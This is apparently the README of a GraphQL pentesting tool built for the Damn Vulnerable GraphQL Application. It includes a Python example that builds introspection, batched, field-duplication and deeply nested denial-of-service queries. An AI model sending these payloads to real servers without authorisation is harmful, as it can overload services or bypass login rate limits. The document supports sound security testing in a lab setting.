GraphQL Exploitation PoC Tool

Overview

This tool tests for common vulnerabilities in GraphQL applications. It retrieves the schema through introspection, runs a set of attack checks (batching, injection, XSS, denial of service, SSRF) against the endpoint, and prints references to the OWASP Top Ten vulnerabilities as background on the risk categories involved.

Acyber Team Developer

Automatic PoC For Damn Vulnerable GraphQL Application.

Features

  • Perform GraphQL introspection to discover the schema (types, fields, and operations).
  • Execute batch queries: send multiple operations to the endpoint in a single HTTP request.
  • Test for OS Command Injection vulnerabilities.
  • Conduct Stored Cross-Site Scripting (XSS) tests.
  • Analyze resource-intensive queries (for example, deeply nested selections).
  • Simulate Denial of Service (DoS) attacks.
  • Check for field duplication: the same field repeated many times in one selection set, which some servers resolve once per occurrence.
  • Test for Server-Side Request Forgery (SSRF).
  • Send custom GraphQL requests.

OWASP Top Ten Vulnerabilities

The tool provides information about the OWASP Top Ten vulnerabilities (2017 edition):

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging & Monitoring

Installation

To run this tool, you need to have Python 3.x installed. You can download it from the official Python website.

Dependencies

Install the required libraries using pip:

pip install requests colorama

Usage

Run the tool with the following command:

python3 graphql_poc.py -u <GraphQL_endpoint_URL> -p <Proxy_URL>

Arguments

  • -u / --url: The GraphQL endpoint URL you want to test.
  • -p / --proxy: (Optional) The proxy URL for intercepting requests (e.g., http://127.0.0.1:8080).

Example

python3 graphql_poc.py -u http://example.com/graphql -p http://127.0.0.1:8080

Attack Types

After running the tool, you will be prompted to select an attack type:

  • GraphQL Introspection: Discover the GraphQL schema.
  • Batch Query Attack: Send multiple operations in a single request.
  • OS Command Injection: Test for command injection vulnerabilities.
  • Stored Cross-Site Scripting (XSS): Test for stored XSS vulnerabilities.
  • Resource Intensive Query: Send a deeply nested, expensive query.
  • Denial of Service Attack: Simulate a DoS attack.
  • Field Duplication Attack: Repeat the same field many times in one query to test whether the server resolves each occurrence.
  • Server-Side Request Forgery (SSRF): Test for SSRF vulnerabilities.
  • Custom GraphQL Request: Send a custom GraphQL request.
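The following is an added example, not code from this tool, showing what the introspection, batch, field duplication and resource-intensive checks listed above look like as actual payloads, plus the check a practitioner wants first: whether an introspection response really carries a schema or only an error. The field names (pastes, owner, systemHealth) and the sample responses are constructed placeholders, and send() is only a thin wrapper around requests that honours the same proxy setting as the -p argument.

```python
"""Payload builders for the GraphQL checks listed above (added example, not
the tool's own code). All field names and sample responses are placeholders."""
import json

# Standard introspection query: asks the server to describe its own schema.
INTROSPECTION_QUERY = """
{
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name
      kind
      fields { name }
    }
  }
}
"""


def build_batch(queries):
    """Array batching: several operations in one HTTP request body.

    Servers that accept a JSON array execute every element, which can defeat
    per-request rate limits (e.g. when brute-forcing a login mutation).
    """
    return [{"query": q} for q in queries]


def build_field_duplication(field, count):
    """Repeat one field `count` times in a single selection set.

    The spec says duplicate fields merge, but servers that resolve each
    occurrence separately do `count` times the work for one request.
    """
    return "{ " + " ".join([field] * count) + " }"


def build_nested_query(outer, inner, depth, leaf="id"):
    """Circular nesting (outer -> inner -> outer ...) repeated `depth` times.

    Used for the resource-intensive / DoS checks: each level multiplies the
    resolver calls when the two types reference each other.
    """
    body = leaf
    for _ in range(depth):
        body = f"{outer} {{ {inner} {{ {body} }} }}"
    return f"{{ {body} }}"


def introspection_enabled(response):
    """True only if a parsed introspection response actually carries a schema."""
    data = response.get("data") or {}
    return "__schema" in data and not response.get("errors")


def summarize_schema(response):
    """Map each user-defined type to its field names, skipping __meta types."""
    types = response["data"]["__schema"]["types"]
    return {
        t["name"]: [f["name"] for f in (t.get("fields") or [])]
        for t in types
        if not t["name"].startswith("__")
    }


def send(url, payload, proxy=None, timeout=10):
    """POST a query (str) or a batch (list) to the endpoint, optionally through
    an intercepting proxy such as http://127.0.0.1:8080. Needs network access."""
    import requests  # only needed for live requests, not for the builders

    body = payload if isinstance(payload, list) else {"query": payload}
    proxies = {"http": proxy, "https": proxy} if proxy else None
    resp = requests.post(url, json=body, proxies=proxies, timeout=timeout)
    return resp.json()


# Constructed sample response (not captured from any real server).
SAMPLE_INTROSPECTION = {
    "data": {
        "__schema": {
            "queryType": {"name": "Query"},
            "mutationType": None,
            "types": [
                {"name": "Query", "kind": "OBJECT",
                 "fields": [{"name": "pastes"}, {"name": "systemHealth"}]},
                {"name": "Paste", "kind": "OBJECT",
                 "fields": [{"name": "id"}, {"name": "owner"}]},
                {"name": "String", "kind": "SCALAR", "fields": None},
                {"name": "__Schema", "kind": "OBJECT",
                 "fields": [{"name": "types"}]},
            ],
        }
    }
}

# Constructed shape of a server with introspection disabled: errors, no data.
SAMPLE_DISABLED = {"errors": [{"message": "introspection is not allowed"}]}

if __name__ == "__main__":
    print(json.dumps(summarize_schema(SAMPLE_INTROSPECTION), indent=2))
    print(build_field_duplication("systemHealth", 3))
    print(build_nested_query("pastes", "owner", 2))
```

Run the builders against a target you are authorised to test by passing INTROSPECTION_QUERY, a build_batch(...) list or a nested query to send(url, payload, proxy="http://127.0.0.1:8080") and reading the result in the intercepting proxy; the depth and count parameters should start small, since the resource-intensive and duplication payloads are designed to cost the server real work.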

Contributing

Contributions are welcome! If you have suggestions for improvements or new features, please open an issue or submit a pull request.

Related Project

For a vulnerable GraphQL application to test against, check out the Damn Vulnerable GraphQL Application.

License

This project is licensed under the MIT License.

Disclaimer

This tool is intended for educational purposes and ethical hacking only. Use it responsibly and only on systems you have permission to test.